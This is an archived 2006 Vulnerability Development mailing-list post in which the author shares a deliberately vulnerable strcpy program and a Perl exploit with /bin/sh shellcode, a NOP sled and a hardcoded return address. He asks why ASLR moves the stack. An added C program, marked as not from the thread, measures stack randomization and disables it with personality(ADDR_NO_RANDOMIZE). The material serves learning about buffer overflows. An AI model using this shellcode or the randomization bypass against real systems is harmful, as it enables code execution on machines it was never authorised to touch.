Vulnerability Development mailing list archives
"Moving" Stack: my poor return address!
From: Jack C <list-recv () crepinc com>
Date: Mon, 31 Jul 2006 22:03:33 -0400
Hello,

To see if I still knew how to code simple buffer overflows after a long absence from it, I threw together a quick vulnerable C program today and wrote an exploit for it. The whole process went great, until I went to find the return address I wanted in the stack. I have a 4096 byte buffer, and since I had the room I put in 2048 NOPs at the beginning of the buffer. However, when I run the exploit then open the core in gdb, the stack is always in a different place. And we're not talking about different place by a few thousand bytes, either. One time I'll run it and the NOPs will be at 0xbfe4dab0, the next time they will be at 0xbf9af420. That's a HUGE distance away!
I'm running on Fedora 5. Is this a security thing that's new in the past 2 years or so since I've coded one of these? Is there any way I can either (1) make the stack sit still so I can point into it or (2) find out where it is during execution?
------- lame.c ------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strcpy() */

int main( int argc, char *argv[]) {
    char buffer[4096]; //we're gonna overflow this jawn

    if (argc!=2) {
        printf("Usage: %s <string to copy>\n",argv[0]);
        return 1;
    }

    strcpy(buffer,argv[1]); //tisk tisk tisk
    printf("Buffer now holds: %s\n",buffer);
    return 0;
}
-----end lame.c -----

------exp.pl -----
#!/usr/bin/perl

my $prog="/home/jack/break/lame";
my $buffer;

# shellcode - /bin/sh; uname -a; id | 89 bytes
my $c0de="\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07".
"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b".
"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff".
"\xff\xff\x03\x65\x63\x68\x6f\x20\x5b\x45\x6c\x65".
"\x63\x74\x72\x6f\x6e\x69\x63\x53\x6f\x75\x6c\x73".
"\x5d\x3b\x20\x75\x6e\x61\x6d\x65\x20\x2d\x61\x3b".
"\x20\x69\x64\x3b\x20\x03\x2d\x63\x02\x2f\x62\x69".
"\x6e\x2f\x73\x68\x01";

$buffer="\x90"x(2048+(1024-length($c0de)));   #NOPs
$buffer.=$c0de;                                #shellcode
$buffer.="\xc0\x15\x9d\xbf"x(1024/4);          #retr addr: 0xbf9d15c0 WAS in the middle...
# other addresses the NOPS were... look how far apart these are!
#0xbfe4dab0-0xbfe4e640
#0xbf9af420-0xbf9affa0

exec $prog, $buffer;
-----end exp.pl------

Thanks for looking, hope someone can lend a hand...

-Jack Carrozzo
jack _{@}_ crepinc.com
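The following is an added example, not code from the original post or from any reply in this thread, written to make the two questions above (does the stack sit still, and can it be made to) measurable on a Linux box. It starts a fresh process several times, reads the start of the "[stack]" mapping from that process's /proc/self/maps, and reports how many distinct stack bases were seen and how far apart they were; then it repeats the measurement after asking the kernel for personality(ADDR_NO_RANDOMIZE), the same mechanism `setarch -R` uses to get a fixed layout for a debugging session. The use of /proc, /bin/cat and the personality() call are assumptions about the host, not anything the post states, and the probe counts are arbitrary.

```c
/* stack_probe.c: measure how much the stack base moves between executions,
 * then pin it with personality(ADDR_NO_RANDOMIZE).  Added example, not from
 * the original post; assumes Linux with /proc and /bin/cat (assumptions). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/personality.h>

/* Find the "[stack]" line in the text of a /proc/<pid>/maps file and return
 * the start address of that mapping; 0 if there is no such line. */
uintptr_t parse_stack_base(const char *maps)
{
    const char *line = maps;
    while (line && *line) {
        const char *eol = strchr(line, '\n');
        size_t len = eol ? (size_t)(eol - line) : strlen(line);
        char buf[256];
        if (len >= sizeof buf) len = sizeof buf - 1;
        memcpy(buf, line, len);
        buf[len] = '\0';
        if (strstr(buf, "[stack]"))
            return (uintptr_t)strtoull(buf, NULL, 16);  /* "start-end ..." */
        line = eol ? eol + 1 : NULL;
    }
    return 0;
}

/* Exec a brand-new image ("/bin/cat /proc/self/maps") so the kernel lays out a
 * fresh stack, and return that image's stack base.  With pin != 0 the child
 * first requests ADDR_NO_RANDOMIZE, which takes effect at execve().  Returns 0
 * on any failure (no /proc, no /bin/cat, personality() refused by a sandbox). */
uintptr_t child_stack_base(int pin)
{
    int fds[2];
    if (pipe(fds) != 0) return 0;
    pid_t pid = fork();
    if (pid < 0) { close(fds[0]); close(fds[1]); return 0; }
    if (pid == 0) {
        close(fds[0]);
        if (dup2(fds[1], STDOUT_FILENO) < 0) _exit(1);
        close(fds[1]);
        if (pin && personality(ADDR_NO_RANDOMIZE) == -1) _exit(2);
        execl("/bin/cat", "cat", "/proc/self/maps", (char *)NULL);
        _exit(3);
    }
    close(fds[1]);
    char maps[16384];
    size_t total = 0;
    ssize_t n;
    while (total < sizeof maps - 1 &&
           (n = read(fds[0], maps + total, sizeof maps - 1 - total)) > 0)
        total += (size_t)n;
    close(fds[0]);
    maps[total] = '\0';
    int status = 0;
    waitpid(pid, &status, 0);
    if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) return 0;
    return parse_stack_base(maps);
}

/* Number of distinct values in addr[0..n); n is tiny, so O(n^2) is fine. */
size_t count_distinct(const uintptr_t *addr, size_t n)
{
    size_t distinct = 0;
    for (size_t i = 0; i < n; i++) {
        size_t j = 0;
        while (j < i && addr[j] != addr[i]) j++;
        if (j == i) distinct++;
    }
    return distinct;
}

/* Probe `runs` fresh processes (at most 64): how many different stack bases
 * were seen and the distance between lowest and highest.  Returns the number
 * of probes that succeeded; 0 means nothing could be measured on this host. */
size_t measure_stack(int pin, size_t runs, size_t *distinct, uintptr_t *spread)
{
    uintptr_t addr[64], lo = 0, hi = 0;
    size_t got = 0;
    if (runs > 64) runs = 64;
    for (size_t i = 0; i < runs; i++) {
        uintptr_t a = child_stack_base(pin);
        if (a) addr[got++] = a;
    }
    for (size_t i = 0; i < got; i++) {
        if (i == 0 || addr[i] < lo) lo = addr[i];
        if (i == 0 || addr[i] > hi) hi = addr[i];
    }
    *distinct = count_distinct(addr, got);
    *spread = hi - lo;
    return got;
}

int main(void)
{
    size_t got, distinct;
    uintptr_t spread;
    got = measure_stack(0, 8, &distinct, &spread);
    printf("randomized: %zu probes, %zu distinct stack bases, spread 0x%llx\n",
           got, distinct, (unsigned long long)spread);
    got = measure_stack(1, 8, &distinct, &spread);
    if (got == 0)
        printf("pinned: personality(ADDR_NO_RANDOMIZE) unavailable here\n");
    else
        printf("pinned: %zu probes, %zu distinct stack bases, spread 0x%llx\n",
               got, distinct, (unsigned long long)spread);
    return 0;
}
```

Build with `cc -o stack_probe stack_probe.c` and run it a few times. With randomization on, the first line shows as many distinct bases as probes and a spread in the megabytes, which is the same effect the post observed between 0xbfe4dab0 and 0xbf9af420; the second line should collapse to one base, because the pin applies to the new image created by execve() (it does not change the layout of an already running process). Two caveats for a practitioner: a container or seccomp policy may refuse personality() with EPERM, in which case the pinned run reports nothing rather than silently measuring a randomized layout, and pinning only makes a lab target sit still; it says nothing about where the stack lands on the real host, which is exactly why a fixed return address guessed from a core file stops working once randomization is on.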
Current thread:
- "Moving" Stack: my poor return address! Jack C (Aug 01)
- Re: "Moving" Stack: my poor return address! Andrea Purificato - bunker (Aug 02)
- Re: "Moving" Stack: my poor return address! Alexander Klimov (Aug 02)
- Re: "Moving" Stack: my poor return address! Steve Bonds (Aug 02)
- Re: "Moving" Stack: my poor return address! Jon Erickson (Aug 02)
- <Possible follow-ups>
- Re: "Moving" Stack: my poor return address! list-recv (Aug 02)
- RE: "Moving" Stack: my poor return address! salexander (Aug 02)
- Re: "Moving" Stack: my poor return address! Javor Ninov (Aug 29)